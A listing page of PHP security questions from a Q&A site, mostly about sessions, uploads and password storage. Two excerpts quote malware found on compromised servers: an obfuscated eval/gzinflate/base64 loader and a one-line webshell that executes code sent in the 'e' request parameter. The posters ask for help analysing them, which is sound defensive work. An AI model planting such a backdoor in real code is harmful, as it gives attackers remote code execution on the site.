Questions tagged [php]

Security aspects concerning code written in the programming language PHP which is often used for web applications.

1619 questions

votes

1 answer

default.php file found on the server, is this a security threat?

I found a file named "default.php" on the server with following code eval(gzinflate(base64_decode( …

php

asked Jan 28 '13 at 10:01

Vaibhav

votes

3 answers

Creating Secure PHP Sessions

I have already created and refined both registration and login systems, However I am lead to believe the tricky part comes when you are creating a session. As far as I know this is due to both Hijacking and fixation. Which in all honesty I don't…

php

asked Nov 13 '12 at 01:10

TuKritical

votes

2 answers

What does this suspicious PHP code do?

I'm cleaning up a website after an attack which resulted in many PHP shells being uploaded. I've found and removed the following code: if(isset($_REQUEST['e'])) { $b="ass"."ert";$a=$b($_REQUEST['e']);${'a'}; } Could you tell me what it does? How…

php

asked Jan 12 '17 at 23:06

user136206

votes

2 answers

Obfuscated php code found on the server

I found this piece of code hosted on my website I'm sure it's a malware. Any have an idea what this script does or how to deobfuscate?

php

asked Aug 22 '14 at 09:53

calculataur

votes

2 answers

Is it possible to disable all PHP functions not used in my application?

I want to secure my PHP installation. I can disable some functions, like system(), exec() etc using disable_functions in php.ini. But I can forget to disable some dangerous functions. Is it possible to disable all functions, excluding the ones…

php

asked May 05 '16 at 07:28

checkbox

votes

3 answers

CLI API that requires plaintext user details

I've been tasked with writing a module for my company to interface with an external API. This API has a syntax similar to SSH where I have to incorporate the user details as well as the host address of the server I'm trying to connect to. …

php

asked Jul 22 '14 at 14:42

Max

votes

2 answers

Secure PHP upload form & storage

I am building a PHP application that allows uploads of files (.doc/pdf etc) for review by a staff member. Some of these files will be somewhat confidential so I need to protect them. Now the best solution would be to get the sender to encrypt these…

php

asked Jan 25 '13 at 21:45

user350325

votes

3 answers

Starting a secure php session

I have been looking into creating secure php sessions for use in a login script for a week or so now. So far I have not found a concrete resource to base my work off, reading StackOverflow all I have seen is mixed views and opinions. I decided to…

php

asked Nov 19 '12 at 05:43

TuKritical

votes

3 answers

DB Passwords: More Secure in a PHP App's .ini config files or apache2 environment variables?

I manage a php app whose key variables (such as database server addresses, DB user names and passwords, etc) change depending on their environment (Dev, QA, Production, etc.). In order to simplify deployment, I have started moving some environment…

php

asked Dec 03 '11 at 00:10

Cloud Controller

votes

4 answers

What security features should a PHP framework have?

What security features would you find useful or expect from a PHP framework? I have a PHP framework that I've developed that I'm going to be releasing as an open source project, but I want to make sure that it has appropriate security features. Here…

php

asked Sep 12 '11 at 22:25

VirtuosiMedia

3,242
3
28
32

votes

2 answers

How to safely display external pictures?

i want to write (and currently writing) a php script to display external images, not hosted on my website. Something like facebook's safe_image. What I'm currently doing is file_get_contents('pic') (or curl) the url and checking for httpcode and…

php

asked Sep 09 '14 at 13:56

GodHand

votes

3 answers

PHP crypt() or phpass for storing passwords?

When storing passwords, should I use PHP's built in crypt or phpass? If using crypt, should I use CRYPT_SHA512 or CRYPT_BLOWFISH?

php

asked Jul 12 '12 at 06:25

willwill

votes

2 answers

Why don't we use MAC address instead of IP address?

I can use the system function in PHP to get the MAC address of site visitors (probably most of you know). Why do we use IP addresss to check whether someone is stealing a cookie or not? Does the system function have more overhead, or is it still…

php

asked Dec 26 '11 at 12:21

Alireza

1,310
1
20
26

votes

3 answers

Can I limit PHP include() to specific directory trees?

I know I can use the php.ini open_basedir directive to limit the directory trees where files can be opened by PHP. But in a directory structure such as this: ├── application │ ├── index.php │ └── www ├── logs └── uploads └──…

php

asked Oct 31 '13 at 15:06

Aaron Adams

votes

3 answers

Security risks using tmpfile() for sensitive data in PHP

What are the primary concerns when storing sensitive data in PHP's temporary directory via tmpfile()? For instance: Could this data be recovered from HDD by a malicious admin? Could the admin easily change the tmp directory to a permanent storage…

php

asked Aug 15 '12 at 17:20

Sam Tuke

2 3 4 5 6 7 Next